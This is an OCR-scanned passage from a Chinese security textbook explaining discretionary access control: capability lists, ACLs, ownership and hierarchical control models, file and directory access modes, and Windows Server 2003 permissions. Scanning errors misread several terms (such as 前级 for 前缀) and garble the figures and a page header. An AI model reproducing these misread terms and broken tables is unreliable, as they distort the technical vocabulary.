具有 授予 某 种 权力 的 用 户 能 够 自主 地 (可 能 是 间接 的 ) 将 访问 权 或 访问 权 的 某 个 子 集 授予 另 
外 的 用 户 。 

需要 自主 访问 控制 保护 的 客体 的 数量 取决 于 系统 环境 ,几乎 所 有 的 系统 在 自主 访问 控 
制 机 制 中 都 包括 对 文件 目录、IPC 以 及 设备 的 访问 控制 。 

为 了 实现 完备 的 自主 访问 控制 机 制 ,系统 要 将 访问 控制 矩阵 相应 的 信息 以 某 种 形式 保 
存在 系统 中 。 访 问 控制 矩阵 的 每 一 行 表示 一 个 主体 ,每 一 列表 示 一 个 受 保护 的 客体 ,矩阵 中 
的 元 素 标识 主体 可 对 客体 进行 的 访问 模式 。 目 前 在 操作 系统 中 实现 的 自主 访问 控制 机 制 都 
不 是 将 矩阵 整个 地 保存 起 来 ,因为 这 样 做 效率 很 低 。 实 际 的 方法 是 基于 和 矩阵 的 行 或 列表 达 
访问 控制 信息 。 

1. 基于 行 的 自主 访问 控制 机 制 

基于 行 的 自主 访问 控制 机 制 在 每 个 主体 上 都 附加 一 个 该 主体 可 访问 的 客体 的 明细 表 ， 
根据 表 中 信息 的 不 同 又 可 分 为 以 下 3 种 形式 。 

1) 能 力 表 (capabilities list) 

能 力 决定 用 户 是 否 可 以 对 客体 进行 访问 以 及 进行 何 种 模式 的 访问 ( 读 、 写 、 执 行 ) ,拥有 
相应 能 力 的 主体 可 以 按照 给 定 的 模式 访问 客体 。 在 系统 的 最 高 层 上 , 即 与 用 户 和 文件 相 联 
系 的 位 置 ,对 于 每 个 用 户 ,系统 有 一 个 能 力 表 。 要 采用 硬件 、 软 件 或 加 密 技 术 对 系统 的 能 力 
表 进 行 保护 ,防止 非法 修改 。 用 户 可 以 把 自己 文件 能 力 的 副本 传 给 其 他 用 户 , 从 而 使 别 的 用 
户 也 可 以 访问 相应 的 文件 ; 也 可 以 从 其 他 用 户 那里 取 回 能 力 ,从 而 恢复 对 自己 文件 的 访问 
权限 。 这 种 访问 控制 方法 ,系统 要 维护 记录 每 个 用 户 状 态 的 一 个 表 , 该 表 保 留成 千 上 万 条 
目 。 当 一 个 文件 被 删除 以 后 ,系统 必须 从 每 个 用 户 的 表 上 清除 该 文件 相应 的 条 目 。 即 使 一 
个 简单 的 “ 谁 能 访问 该 文件 ?” 的 问题 ,也 要 花费 系统 大 量 时 间 从 每 个 用 户 的 能 力 表 中 寻找 。 
因此 ,目前 利用 能 力 表 实 现 的 自主 访问 控制 系统 不 多 ,并 且 在 这 些 为 数 不 多 的 系统 中 ,只 有 
少数 系统 试图 实现 完备 的 自主 访问 控制 机 制 。 

2) 前 级 表 (prefixes) 

对 每 个 主体 赋予 的 前 缀 表 ,包括 受 保护 客体 名 和 主体 对 它 的 访问 权限 。 当 主体 要 访问 
某 客体 时 ,自主 访问 控制 机 制 将 检查 主体 的 前 级 是 否 具有 它 所 请 求 的 访问 权 。 

作为 一 般 的 安全 规则 ,除非 主体 被 授予 某 种 访问 模式 ,否则 任何 主体 对 任何 客体 都 不 具 


态 问 挫 课 与 VPN 靶 太 


秦 于 案例 的 网 络 安全 技术 与 实践 


有 任何 访问 权力 。 相 对 而 言 用 专门 的 安全 管理 员 控 制 主体 前 级 是 比较 安全 的 ,但 这 种 方法 
非常 受 限 。 在 一 个 频繁 更 迭 对 客体 的 访问 权 的 环境 下 ,这 种 方法 肯定 是 不 适宜 的 。 因 为 访 
问 权 的 撤销 一 般 也 是 比较 困难 的 ,除非 对 每 种 访问 权 , 系 统 都 能 自动 校 验 主体 的 前 级。 而 删 
除 一 个 客体 则 需要 判定 在 哪个 主体 前 级 中 有 该 客体 。 另 外 客体 名 由 于 通常 是 杂乱 无 章 的 ， 
所 以 很 难 分 类 。 对 于 一 个 可 访问 许多 客体 的 主体 , 它 的 前 绥 量 将 是 非常 大 的 ,因而 是 很 难 管 
理 的 。 此 外 ,所 有 受 保护 的 客体 都 必须 具有 唯一 的 客体 名 ,互相 不 能 重 名 ,而 在 一 个 客体 很 
多 的 系统 中 ,应 用 这 种 方法 就 十 分 困难 。 

3) 口令 (password) 

在 基于 口令 机 制 的 自主 访问 机 制 中 ,每 个 客体 都 相应 地 有 一 个 口令 。 主 体 在 对 客体 进 
行 访问 前 ,必须 向 操作 系统 提供 该 客体 的 口令 。 如 果 正 确 , 它 就 可 以 访问 该 客体 。 

如 果 对 每 个 客体 ,每 个 主体 都 拥有 它 自己 独 有 的 口令 , 则 类 似 于 能 力 表 系统 。 不 同 之 处 
在 于 ,口令 不 像 能 力 那 样 是 动态 的 。 系 统一 般 允 许 对 每 个 客体 分 配 一 个 口令 或 者 对 每 个 客 
体 的 每 种 访问 模式 分 配 一 个 口令 。 一 般 来 说 ,一 个 客体 至 少 需 要 两 个 口令 : 一 个 用 于 控制 
读 , 一 个 用 于 控制 写 。 对 于 口令 的 分 配 , 有 些 系统 是 只 有 系统 管理 员 才 有 权力 进行 ,而 另外 
一 些 系统 则 允许 客体 的 拥有 者 任意 地 改变 客体 的 口令 。 

口令 机 制 对 于 确认 用 户 身 份 ,也 许 是 一 种 比较 有 效 的 方法 ,但 用 于 客体 访问 控制 , 它 并 
不 是 一 种 合适 的 方法 。 因 为 如 果 要 撤销 某 用 户 对 一 个 客体 的 访问 权 , 只 有 通过 改变 该 客体 
的 口令 才 行 ,这 同时 也 意味 着 废除 了 所 有 其 他 可 访问 该 客体 的 用 户 的 访问 权力 。 当 然 可 以 
对 每 个 客体 使 用 多 个 口令 来 解决 这 个 问题 ,但 每 个 用 户 必须 记 住 许多 不 同 的 口令 , 当 客 体 很 
多 时 ,用 户 就 不 得 不 将 这 些 口 令 记 录 下 来 才 不 至 于 混淆 或 遗忘 ,这 种 管理 方式 很 麻烦 也 不 安 
全 。 另 外 ,口令 是 手工 分 发 的 ,无 须 系统 参与 ,所 以 不 知道 究竟 是 哪个 用 户 访问 了 该 客体 。 
并 且 当 一 个 程序 运行 期 间 要 访问 某 个 客体 时 ,该 客体 的 口令 就 必须 镶嵌 在 程序 中 ,这 就 大 大 
增加 了 口令 意外 泄露 的 危险 。 因 为 其 他 用 户 完全 不 必 知 道 某 客体 的 口令 ,只 需 运 行 一 段 镶 
嵌 该 客体 口令 的 程序 就 可 以 访问 到 该 客体 了 。 这 同样 给 这 种 机 制 带 来 了 不 安全 性 。 

2. 基于 列 的 自主 访问 控制 机 制 

基于 列 的 自主 访问 控制 机 制 ,在 每 个 客体 都 附加 一 个 可 访问 它 的 主体 的 明细 表 , 它 有 两 
种 形式 , 即 保护 位 和 访问 控制 表 。 

(1) 保护 位 (protection bits) 。 这 种 方法 对 所 有 主体 .主体 组 以 及 客体 的 拥有 者 指明 一 
个 访问 模式 集合 。 保 护 位 机 制 不 能 完备 地 表达 访问 控制 矩阵 ,一 般 很 少 使 用 。 

(2) 存 取 控 制 表 (Access Control List, ACL)。 这 是 国际 上 流行 的 一 种 十 分 有 效 的 自主 
访问 控制 模式 , 它 在 每 个 客体 上 都 附加 一 个 主体 明细 表 ,表示 访问 控制 矩阵 。 表 中 的 每 一 项 
都 包括 主体 的 身份 和 主体 对 该 客体 的 访问 权限 ,其 一 般 结构 如 图 13. 4 所 示 。 


客体 file :| ID1. rx ID2.r ID3. x 多 IDn. rwx 


图 13.4 存 取 控制 表 ACL 


对 于 客体 file; ,主体 ID1 对 它 只 具有 读 (r) 和 运行 (x) 的 权力 ,主体 ID2 只 具有 读 权力 ， 
主体 ID3 只 具有 运行 的 权力 ,而 主体 IDn 则 对 它 同 时 具有 读 、 写 和 运行 的 权力 。 但 在 实际 
应 用 中 , 当 对 某 客体 可 访问 的 主体 很 多 时 ,访问 控制 表 将 会 变 得 很 长 。 而 在 一 个 大 系统 中 ， 


客体 和 主体 都 非常 多 ,这 时 使 用 这 种 一 般 形式 的 访问 控制 表 将 占用 很 多 CPU 时 间 。 因 此 
访问 控制 表 必须 简化 ,如 把 用 户 按 其 所 属 或 其 工作 性 质 进 行 分 类 ,构成 相应 的 组 (group) ,并 
设置 一 个 通配符 (wild card)“ x*”, 代 表 任 何 组 名 或 主体 标识 ,如 图 13. 5 所 示 。 


文件 ALPHA 


Jones | CRYPTO IWX 
关 CRYPTO 交 放 


Green 类 


x x r 


13.5 存 取 控制 表 的 优化 


在 图 13. 5 中 , CRYPTO 组 中 的 用 户 Jones 对 文件 ALPHA 拥有 rwx 访问 权限 。 
CRYPTO 同 组 中 的 其 他 用 户 拥有 rx 权限 。Green 如 果 不 在 CRYPTO 同 组 中 ,就 没有 任何 
权限 。 其 他 用 户 拥有 r 权限 。 

通过 这 种 简化 ,访问 控制 表 就 大 大 缩小 了 ,效率 提高 了 ,并 且 也 能 够 满足 自主 访问 控制 
的 需要 。 

3. 自主 访问 控制 的 访问 许可 

在 许多 系统 中 ,对 访问 许可 与 访问 模式 不 加 区 分 。 但 是 ,在 自主 访问 控制 机 制 中 ,应 当 
对 此 加 以 区 分 ,这 种 区 分 会 把 客体 的 控制 与 对 客体 的 访问 区 别 开 来 。 由 于 访问 许可 允许 主 
体 修改 客体 的 存 取 控制 表 , 因 此 利用 它 可 以 实现 对 自主 访问 控制 机 制 的 控制 。 这 种 控制 有 
3 种 类 型 。 

1) 拥有 型 

其 中 一 种 控制 方式 就 是 对 每 个 客体 设立 一 个 拥有 者 (通常 是 该 客体 的 生产 者 ), 只 有 拥 
有 者 才 是 对 客体 有 修改 权 的 唯一 主体 ,拥有 者 对 其 拥有 的 客体 具有 全 部 控制 权 。 但 是 ,拥有 
者 无 权 将 其 对 客体 的 控制 权 分 配给 其 他 主体 。 因 此 ,客体 拥有 者 在 任何 时 候 都 可 以 改变 其 
所 属 客体 的 访问 控制 表 , 并 可 以 对 其 他 主体 授予 或 者 撤销 其 对 客体 的 任何 一 种 访问 模式 。 
系统 管理 员 应 能 够 对 系统 进行 某 种 设置 .使 得 每 个 主体 都 有 一 个 “ 主 目录 ”(home 
directory) 。 对 主 目 录 下 的 子 目 录 及 文件 的 访问 许可 权 应 授予 该 主 目录 的 主人 ,使 其 能 够 修 
改 主 目录 下 客体 的 访问 控制 表 , 但 不 允许 使 拥有 者 具有 分 配 这 种 访问 许可 权 的 权力 。 可 以 
把 拥有 型 控制 看 成 是 二 级 的 树 状 控制 。 在 UNIX 系统 中 ,利用 超级 用 户 来 实施 特权 控制 ， 
就 是 拥有 型 的 一 个 典型 例子 。 

2) 等 级 型 

可 以 将 对 客体 访问 控制 表 的 修改 能 力 划 分 成 等 级 ,例如 可 以 将 控制 关系 组 成 一 个 树 状 
结构 ,如 图 13. 6 所 示 。 系 统管 理 员 的 等 级 设 为 等 级 树 的 根 , 根 一 级 具有 修改 所 有 客体 访问 
控制 表 的 能 力 ,并 且 具 有 向 任意 一 个 主体 分 配 这 种 修改 权 的 能 力 。 系 统管 理 员 可 以 按 部 门 
将 工作 人 员 分 成 多 个 子 集 ,并 对 部 门 领导 授予 相应 访问 控制 表 的 修改 权 和 对 修改 权 的 分 配 
权 。 部 门 领导 又 可 将 自己 部 门 的 人 员 分 成 若干 个 组 ,并 且 对 组 级 领导 授予 相应 的 对 访问 控 
制 表 的 修改 权 。 在 树 中 的 最 低级 的 主体 不 再 具有 访问 许可 ,也 就 是 说 ,它们 对 相应 客体 的 访 
问 控制 不 具有 修改 权 。 有 访问 许可 的 主体 即 有 能 力 修改 客体 的 访问 控制 表 的 主体 ,可 以 对 
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自己 授予 任何 访问 模式 的 访问 权 。 
i 
| ] 
部 门 领 导 部 门 领导 
| 科 组 领导 | 科 组 领导 | 科 组 领导 | | 科 组 领导 | 
成 员 成 员 成 员 成 员 成 员 成 员 成 员 成 员 


13.6 等 级 型 访问 控制 示意 图 


这 种 结构 的 优点 是 : 通过 选择 可 信任 的 人 担任 各 级 领导 ,使 得 能 力 以 可 信和 方式 对 客体 
施加 控制 ,并 且 这 种 控制 和 人 员 的 组 织 体系 相近 似 。 缺 点 是 : 对 于 一 个 客体 而 言 ,可 能 会 同 
时 有 多 个 主体 有 能 力 修改 它 的 访问 控制 表 。 

3) 自由 型 

自由 型 方式 的 特点 是 : 一 个 客体 的 生产 者 可 以 对 任何 一 个 主体 分 配对 它 拥 有 的 客体 的 
访问 控制 权 , 即 对 客体 的 访问 控制 表 有 修改 权 , 并 且 还 可 以 使 其 对 其 他 主体 也 具有 分 配 这 种 
权力 的 能 力 。 在 这 种 系统 中 ,不 存在 “拥有 者 ”概念 。 例 如 ,一 旦 一 个 主体 A 将 修改 其 客体 
访问 控制 表 的 权力 与 分 配 这 种 权力 的 能 力 授 予 了 主体 B, 那 么 主体 B 就 可 以 将 这 种 能 力 分 
配给 其 他 主体 ,而 不 必 征 求 客体 生产 者 的 同意 。 这 样 , 一 旦 访问 许可 权 被 分 配 出 去 ,就 很 难 
控制 客体 了 。 虽 然 可 以 从 客体 的 访问 控制 表 中 查 出 所 有 能 修改 者 的 名 字 , 但 是 没有 任何 主 
体能 对 该 客体 的 安全 负责 。 

4. DAC 的 优点 与 不 足 

自主 访问 控制 是 一 种 允许 主体 对 访问 控制 施加 特定 限制 的 访问 控制 类 型 。 它 允许 主体 
针对 访问 资源 的 用 户 设置 访问 控制 权限 ,用 户 对 资源 的 每 次 访问 都 会 检查 用 户 对 资源 的 访 
问 权 限 , 只 有 通过 验证 的 用 户 才能 访问 资源 。 

自主 访问 控制 是 基于 用 户 的 ,所 以 其 具有 很 高 的 灵活 性 ,这 使 得 这 种 策略 适合 于 各 类 操 
作 系统 和 应 用 程序 ,特别 是 在 商业 和 工业 领域 。 例 如 ,在 很 多 应 用 环境 中 ,用 户 需 要 在 没有 
系统 管理 员 接 入 的 情况 下 拥有 设 定 其 他 用 户 访 问 其 所 控制 信息 资源 的 能 力 , 因 此 控制 就 具 
有 很 大 的 任意 性 。 在 这 种 环境 下 ,用 户 对 信息 的 访问 控制 是 动态 的 ,这 时 采用 自主 访问 控制 
是 比较 合适 的 。 

DAC 的 优点 主要 体现 在 其 自主 性 为 用 户 提 供 了 极 大 的 灵活 性 ,从 而 使 其 适合 于 许多 系 
统 和 应 用 。 但 也 正 由 于 这 种 自主 性 ,在 DAC 中 ,信息 总 是 可 以 从 一 个 实体 流向 另 一 个 实 
体 , 即 使 对 于 高 度 机 密 的 信息 也 是 如 此 ,因此 如 果 自 主 访问 控制 不 加 以 控制 就 会 产生 严重 的 
安全 隐患 。 

例如 ,用 户 A 可 以 将 其 对 客体 O 的 访问 权限 传递 给 用 户 B, 从 而 使 不 具备 对 O 访问 权 
限 的 B 也 可 以 访问 O, 这 样 的 结果 是 易于 产生 安全 漏洞 ,因此 自主 访问 控制 的 安全 级 别 较 
低 。 此 外 ,由 于 同一 用 户 对 不 同 的 客体 有 不 同 的 访问 权限 ,不 同 的 用 户 对 同一 客体 有 不 同 的 
访问 权限 ,因此 用 户 、 权 限 和 客体 间 的 授权 管理 也 是 相当 复杂 的 。 

此 外 ,这 种 策略 也 存在 不 能 保证 信息 传输 的 安全 性 等 隐患 ,因为 入侵 者 有 很 多 方法 绕 过 
验证 来 获得 资源 。 例 如 ,一 个 用 户 能 读 取 某 些 数据 ,然后 他 就 可 以 把 这 些 数据 转发 给 其 他 原 
本 没有 这 一 权限 的 人 。 这 是 因为 ,自主 访问 控制 策略 本 身 没 有 对 已 经 具有 权限 的 用 户 如 何 


使 用 和 传播 信息 强加 任何 限制 。 但 在 强制 策略 系统 中 ,高 安全 等 级 数据 传播 到 低 安全 等 级 
是 受 限 制 的 。 在 自主 访问 控制 策略 环境 中 ,为 了 保证 安全 ,默认 参考 设置 是 拒绝 访问 ,以 提 
高 信息 的 安全 性 。 


13.2.2 自主 访问 控制 访问 模式 


自主 访问 控制 包括 身份 型 (identity-based) 访 问 控制 和 用 户 指定 型 (user-directed) 访 问 
控制 ,通常 又 可 以 分 为 目录 式 访问 控制 .访问 控制 表 、 访 问 控制 矩阵 和 面向 过 程 的 访问 控制 
等 方式 。 

在 实现 自主 访问 控制 的 各 种 各 样 的 系统 中 ,访问 模式 的 应 用 是 很 广泛 的 。 这 里 只 介绍 
最 常用 的 模式 。 

1. 文件 

对 文件 设置 的 访问 模式 有 以 下 几 种 。 

1) 读 拷 贝 (read-copy) 

该 模式 允许 主体 对 客体 进行 读 与 拷贝 的 访问 操作 。 在 大 多 数 系统 中 ,把 read 模式 作为 
read-copy 模式 来 设置 。 从 概念 上 讲 ,作为 仅 允 许 显 示 客 体 的 read 模式 是 有 价值 的 。 

2) 写 删 除 (write-delete) 

该 访问 模式 允许 主体 用 任何 方法 ,包括 扩展 (expand) ,收缩 (shrink) 和 删除 (delete) 修 
改 一 个 客体 。 在 不 同 的 系统 中 有 不 同 的 写 模式 ,实现 主体 对 客体 的 修改 。 例 如 写 附加 
(write-append) ,删除 (delete) 、 写 修改 (write-modify) 等 。 系 统 可 以 根据 客体 的 特性 采用 不 
同 的 模式 ; 可 以 将 几 种 模式 映射 为 一 种 模式 ; 也 可 以 映射 为 自主 访问 控制 支持 的 最 小 的 模 
式 集合 ; 还 可 以 将 所 有 的 可 能 的 写 模 式 都 作 描 述 ,而 只 将 一 个 模式 子 集 应 用 到 一 种 特殊 类 
型 的 客体 。 

3) 执行 (execute) 

该 模式 允许 主体 将 客体 作为 一 种 可 执行 文件 来 执行 。 在 许多 系统 中 ,执行 模式 需要 读 
模式 。 例 如 在 有 的 系统 中 ,要 求 在 实现 动态 链接 过 程 中 引进 连接 段 (linkage section) ,而 在 
连接 段 中 常 涉 及 常数 和 寻找 入 口 点 的 操作 ,这 些 操 作 被 认为 是 对 客体 文件 的 读 操作 。 因 此 ， 
此 时 需要 执行 某 个 段 时 ,还 需要 有 读 访问 模式 。 

4) Null( 无 效 ) 

这 种 模式 表示 主体 对 客体 不 具有 任何 访问 权 。 在 存 取 控制 表 中 用 这 种 模式 可 以 排斥 某 
个 特定 的 主体 。 假 如 一 个 客体 是 文件 的 话 , 对 它 的 访问 模式 的 最 小 集 是 应 用 于 许多 系统 中 
常用 的 访问 模式 的 集合 ,这 包括 读 拷贝 (read-copy) 、 写 删除 (write-delete) .执行 (execute) 和 
无 效 (null) 。 这 些 模 式 为 文件 的 访问 提供 了 一 个 最 小 但 不 是 充分 的 组 合 。 在 许多 情况 下 ， 
只 用 最 小 的 模式 集合 是 不 够 的 。 大 部 分 操作 系统 是 将 自主 访问 控制 应 用 于 客体 ,而 不 单单 
只 是 用 于 文件 ,文件 是 一 种 特殊 的 客体 。 大 多 数 情况 下 , 除 文 件 以 外 的 客体 也 被 构造 成 文 
件 。 因 此 ,通常 根据 客体 的 特殊 结构 对 它们 都 有 某 种 扩充 的 访问 模式 。 一 般 都 用 类 似 数 据 
抽象 的 方式 来 实现 它们 ,也 就 是 操作 系统 将 “扩充 的 ”访问 模式 映射 为 基本 访问 模式 。 

2. 目录 

如 果 文 件 系统 中 的 文件 目录 是 树 型 结构 ,那么 树 中 的 目录 也 代表 一 类 文件 。 因 此 ,对 它 
也 可 以 设置 访问 模式 。 通 常用 以 下 3 级 方式 来 控制 对 目录 和 与 目录 相应 的 文件 的 访问 操 
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作 : 对 目录 而 不 对 文件 实施 访问 控制 .对 文件 而 不 对 目录 实施 访问 控制 .对 目录 及 文件 都 实 
施 访问 控制 。 

(1) 如 果 仅 对 目录 设置 控制 ,那么 一 旦 授予 某 个 主体 对 一 个 目录 的 访问 权 , 它 就 可 以 访 
问 该 目录 下 的 所 有 文件 。 当 然 ,如 果 在 该 目录 下 的 客体 是 另 一 个 目录 ,那么 如 果 主 体 还 想 访 
问 该 子 目 录 , 它 就 必须 获得 该 子 目 录 的 访问 权 。 另 外 , 仅 对 目录 设置 访问 控制 模式 的 方法 ， 
需要 按 访问 类 型 对 文件 进行 分 组 ,这 样 要 求 会 造成 限制 过 多 ,在 文件 分 类 时 还 会 带 来 新 的 
问题 。 

(2) 如 果 仅 对 文件 设置 访问 模式 ,这 种 控制 可 能 会 更 加 细致 些 。 仅 对 某 个 文件 设置 的 
模式 与 同一 目录 下 的 其 他 文件 没有 任何 关系 。 但 是 ,这 样 也 有 一 些 问 题 , 例 如 如 果 不 对 目录 
设置 限制 ,那么 主体 可 以 设法 浏览 存储 结构 而 看 到 其 他 文件 的 名 字 。 而 且 在 这 种 情况 下 , 文 
件 的 放置 没有 受 任 何 控制 ,结果 使 文件 目录 的 树 结构 失去 了 意义 。 

(3) 通常 最 好 是 对 文件 .目录 都 施 以 访问 控制 。 但 是 ,设计 者 要 能 够 决定 是 否 允 许 主体 
在 访问 文件 时 对 整个 路 径 都 可 以 访问 ,同时 要 考虑 只 允许 访问 文件 本 身 是 否 是 充分 的 。 如 
果 一 个 系统 允许 主体 访问 客体 但 又 不 允许 有 对 该 客体 的 父 目 录 的 访问 权 ,那么 实现 起 来 通 
常会 比较 复杂 。 

在 UNIX 系统 中 ,对 某 目 录 不 具备 任何 访问 权 意 味 着 对 该 目录 控制 下 的 所 有 子 客体 
(文件 和 子 目 录 ) 都 无 权 访 问 。 对 目录 的 访问 模式 的 最 小 集合 包括 读 (read) 与 写 -扩展 
(write-expand)。 读 (read) 模 式 允 许 主体 看 到 目录 的 实体 ,包括 目录 名 、 存 取 控 制 表 和 与 该 
目录 下 的 文件 . 子 目录 等 相应 的 信息 。read 访问 模式 意味 着 有 权 访问 该 目录 下 的 子 客 体 
( 子 目录 与 文件 )。 至 于 哪个 主体 能 对 它们 进行 访问 还 要 视 该 主体 的 存 取 控制 权限 。 写 - 扩 
展 (write-expand) 模 式 允 许 主体 在 该 目录 下 增加 一 个 新 的 客体 , 即 允 许 用 户 在 该 目录 下 生 
成 与 删除 文件 或 者 生成 与 删除 子 目 录 。 由 于 目录 访问 模式 是 对 文件 访问 控制 的 扩展 ,因此 
它 取 决 于 目录 的 结构 .取决 于 系统 。 有 的 系统 为 目录 设置 了 3 种 访问 模式 : 读 状态 (read 
status) ,修改 (modify) 、 附 加 (append)。 读 状态 (read status) 模 式 允 许 主体 看 到 目录 结构 及 
其 子 客体 的 属性 ,修改 (modify) 模 式 允 许 主体 修改 (包括 删除 ) 这 些 属性 ,而 附加 (append) 模 
式 允 许 主体 生成 新 的 子 客体 。 操 作 系 统 在 决定 系统 的 自主 访问 控制 中 应 该 包括 什么 样 的 客 
体 以 及 应 该 为 每 种 客体 设置 什么 样 的 访问 模式 时 ,要 在 用 户 的 友善 性 与 自主 访问 控制 机 制 
的 复杂 性 之 间 做 适当 的 折 中 。 


13.2.3 自主 访问 控制 实例 


下 面 以 Windows Server 2003 为 例 对 自主 访问 控制 进行 实例 分 析 。 

Windows Server 2003 的 访问 控制 策略 是 基于 自主 访问 控制 的 ,根据 对 用 户 进 行 授 权 ， 
来 决定 用 户 可 以 访问 哪些 资源 和 对 这 些 资源 的 访问 能 力 ,以 保证 资源 的 合法 、 受 控 的 使 用 。 

基本 来 说 ,Windows Server 2003 的 访问 控制 策略 是 完善 的 ,方便 的 、 先 进 的 。 可 以 保 
证 没有 特定 权限 的 用 户 不 能 访问 任何 资源 ,而 同时 这 些 安全 性 的 运行 又 是 透明 的 。 既 可 防 
止 未 授权 用 户 的 阁 入 ,也 可 防止 授权 用 户 做 他 不 该 做 的 事情 ,从 而 保证 了 整个 网 络 系统 高 
效 、 安 全 的 正常 运行 。 

Windows Server 2003 提供 了 网 络 环境 下 的 一 个 成 功 的 安全 保密 系统 ,从 最 初 开发 到 
目前 的 广泛 使 用 ,其 安全 系统 已 日 趋 成 熟 、 完 备 ,但 同时 也 使 得 系统 的 管理 人 员 在 构造 网 络 


环境 .进行 权限 分 配 时 ,感到 复杂 、 难 以 掌握 ,很 难 设置 完善 ,这 也 使 攻击 者 找到 漏洞 成 为 
可 能 。 

Windows Server 2003 的 网 络 安全 性 依赖 于 给 用 户 或 组 授权 的 3 种 能 力 : 权力 (在 系统 
上 完成 特定 动作 的 授权 ,一 般 由 系统 指定 给 内 置 组 ,但 也 可 以 由 管理 员 将 其 扩大 到 组 和 用 户 
上 ) 共享 (用 户 可 以 通过 网 络 使 用 的 文件 夹 )、 权 限 ( 可 以 授予 用 户 或 组 的 文件 系统 能 力 ) 。 

为 了 简化 授权 ,还 有 用 户 组 的 概念 ,同一 用 户 组 的 用 户 的 权限 设置 相同 。 另 外 为 大 型 或 
复杂 系统 提供 了 更 为 灵活 和 简便 的 管理 方法 ,还 涉及 域 间 委托 的 问题 。 下 面 就 分 别 加 以 讨论 。 

1. 权力 

权力 适用 于 对 整个 系统 范围 内 的 对 象 和 任务 的 操作 ,通常 是 用 来 授权 用 户 执行 某 些 系 
统 任务 。 当 用 户 登录 到 一 个 具有 某 种 权力 的 账号 时 ,该 用 户 就 可 以 执行 与 该 权力 相关 的 
任务 。 

表 13. 3 列 出 了 用 户 的 特定 权力 。 


表 13.3 用 户 的 特定 权力 


| 允许 的 用 户 动作 
Access this computer from network 可 使 用 户 通 过 网 络 访问 该 计算 机 
Add workstation to a domain 允许 用 户 将 工作 站 添加 到 域 中 
Backup files and directories 授权 用 户 对 计算 机 的 目录 和 文件 进行 备份 
Change the system time 用 户 可 以 设置 计算 机 的 系统 时 钟 
Load and unload device drive 允许 用 户 在 网 络 中 安装 和 删除 设备 的 驱动 程序 
Restore files and directories 允许 用 户 恢复 以 前 备份 的 文件 和 目录 
Shutdown the system 允许 用 户 关闭 系统 


以 上 这 些 权 力 一 般 已 经 由 系统 授 给 内 置 组 ,需要 时 也 可 以 由 管理 员 将 其 扩大 到 组 和 用 
Es 

2. 共享 权限 

共享 只 适用 于 文件 夹 ( 目 录 )。 如 果 文 件 夹 不 是 共享 的 ,那么 在 网 络 上 就 不 会 有 用 户 看 
到 它 , 也 就 更 不 能 访问 。 网 络 上 的 绝 大 多 数 服务 器 主要 用 于 存放 可 被 网 络 用 户 访 问 的 文件 
和 目录 ,要 使 网 络 用 户 可 以 访问 在 Windows Server 2003 服务 器 上 的 文件 和 目录 ,必须 首先 
对 它 建立 共享 。 共 享 权限 建立 了 通过 网 络 对 共享 目录 访问 的 最 高 级 别 。 

表 13.4 列 出 了 从 最 大 限制 到 最 小 限制 的 共享 权限 及 相应 级 别 允 许 的 用 户 动 作 。 

表 13.4 共享 权限 及 相应 级 别 允 许 的 用 户 动作 


共享 权限 级 别 允许 的 用 户 动作 
No access( 不 能 访问 ) 禁止 对 目录 和 其 中 的 文件 及 子 目录 进行 访问 
Read( 读 ) 允许 查看 文件 名 和 子 目录 名 ,改变 共享 目录 的 子 目 录 , 还 允许 查看 文件 的 数 
据 和 运行 应 用 程序 
Change( 更 改 ) 具有 " 读 ? 权 限 中 允许 的 操作 ,另外 允许 往 目录 中 添加 文件 和 子 目录 ,更 改 文 


件数 据 ,删除 文 件 和 子 目 录 
Full control( 完 全 控制 ) 有 具 有“ 更改” 权限 中 允许 的 操作 ,另外 还 允许 更 改 权 限 (只 适用 于 NTFS 卷 ) 
和 获取 所 有 权 ( 只 适用 于 NTFS 卷 ) 
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3. 权限 

权限 适用 于 对 特定 对 象 如 目录 和 文件 (只 适用 于 NTFS 卷 ) 的 操作 ,指定 允许 哪些 用 户 
可 以 使 用 这 些 对 象 ,以 及 如 何 使 用 (如 把 某 个 目录 的 访问 权限 授予 指定 的 用 户 )。 权 限 分 为 
目录 权限 和 文件 权限 ,每 一 个 权限 级 别 都 确定 了 一 个 执行 特定 的 任务 组 合 的 能 力 ,这 些 任务 
是 Read(R) 、Execute(X) 、Write(W) 、Delete(D) 、Set Permission(P) 和 Take Ownership 
(O)。 表 13.5 和 表 13.6 显示 了 这 些 任务 是 如 何 与 各 种 权限 级 别 相关 联 的 。 


表 13.5 目录 权限 
权限 级 别 RXWDPO 允许 的 用 户 动作 
No access 用 户 不 能 访问 该 目录 
List RX 可 以 查看 目录 中 的 子 目录 和 文件 名 ,也 可 以 进入 其 子 
目录 
Read RX 具有 List 权限 ,用 户 可 以 读 取 目 录 中 的 文件 和 运行 目录 
中 的 应 用 程序 
Add XW 用 户 可 以 添加 文件 和 子 目 录 
Add and Read RXW 具有 Read 和 Add 的 权限 
Change RXWD 有 Add 和 Read 的 权限 ,另外 还 可 以 更 改 文件 的 内 容 , 删 
除 文 件 和 子 目录 
Full control RXWDPO 有 Change 的 权限 ,另外 用 户 可 以 更 改 权限 和 获取 目录 的 
所 有 权 
表 13.6 文件 权限 
权限 级 别 RXWDPO 允许 的 用 户 动作 
No access 用 户 不 能 访问 该 目录 
Read RX 用 户 可 以 读 取 该 文件 ,如 果 是 应 用 程序 可 以 允许 该 文件 
Change RXWD 有 Read 的 权限 ,还 可 用 修改 和 删除 文件 
Full control RXWDPO 包含 Change 的 权限 ,还 可 以 更 改 权 限 和 获取 文件 的 所 有 权 


4. 用 户 组 

用 户 组 是 指 具 有 相同 用 户 权力 的 一 组 用 户 。 以 组 的 形式 组 织 用 户 只 需 通 过 一 次 操作 就 
能 更 改 整个 组 的 权力 和 权限 ,从 而 可 以 更 快速 方便 地 为 多 个 用 户 授权 对 网 络 资源 的 访问 , 简 
化 网 络 的 管理 维护 工作 。 

Windows Server 2003 支持 两 种 类 型 的 组 。 

(1) 全 局 组 : 包含 来 自 全 局 组 创建 时 所 在 域 的 用 户 账号 ,运用 域 之 间 的 委托 关系 可 以 
给 全 局 组 授予 在 其 他 委托 域 中 的 资源 的 权力 和 权限 。 

(2) 局 部 组 : 可 以 包含 该 组 所 在 域 和 其 他 受托 域 中 的 用 户 账 号 ,也 可 以 包含 该 组 所 在 
域 和 其 他 受托 域 中 的 全 局 组 。 只 能 给 局 部 组 授予 该 组 所 在 域 中 的 权力 和 权限 。 

5. 域 和 委托 

域 是 Windows Server 2003 网 络 安全 系统 的 基本 组 成 单元 ; 委托 是 复杂 的 Windows 
Server 2003 网 络 中 域 之 间 的 基本 关系 。 在 Windows Server 2003 中 通过 域 的 委托 关系 为 大 
